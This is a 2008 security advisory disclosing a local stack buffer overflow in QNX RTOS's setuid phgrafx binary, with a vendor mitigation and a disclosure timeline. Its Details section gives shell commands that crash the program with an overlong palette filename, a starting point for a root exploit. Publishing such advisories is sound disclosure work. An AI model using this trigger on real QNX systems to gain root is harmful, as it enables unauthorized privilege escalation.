|
QNX phgrafx Privilege Escalation Vulnerability
Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008
Filename: SCANIT-2008-001.txt
SCANIT ID: SCANIT-2008-001
Published: June 30th, 2008
I. Summary
QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time
operating system designed for use in embedded systems. From QNX's
website:
"Companies worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco
depend on
the QNX technology for network routers, medical devices, intelligent
transportation systems, safety and security systems, next-generation
robotics, and other mission-critical applications. In addition, QNX
forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an
engineering concept vehicle. The new system supports the development
of next-generation in-car communications, infotainment, and
telematics applications." More information is available at
http://www.qnx.com/products/rtos/.
Local exploration of a buffer overflow vulnerability inside
/usr/photon/bin/phgrafx included by default in QNX RTOS latest
version (6.3.2) could allow an attacker to gain root privileges.
II. Affected Products
Scanit has confirmed the existence of this vulnerability in QNX RTOS
6.3.2 and
QNX RTOS 6.3.0. Probably previous versions are vulnerable too.
III. Details
The vulnerability itself exists due to improper handling of the
PHOTON_PATH/palette/*.pal file. When a filename greater than
285 characters is created with the extension .pal in the directory
"palette",
a stack-based overflow occurs, allowing the attacker to control program
flow.
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#
IV. Solution
According to the vendor's response:
"QNX Software Systems confirms this vulnerability in Momentics 6.3.2 and
earlier versions. The phgrafx binary is to be deprecated in future
releases. For the time being, it is recommended that the user clear the
set user ID bit from the file permissions. If this is done, only the
root user may change the graphics configuration."
V. Timeline
February 20th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
March 27th, 2008 - Vendor response
June 30th, 2008 - Advisory release
VI. Credits
This vulnerability was discovered by Scanit's researchers Filipe
Balestra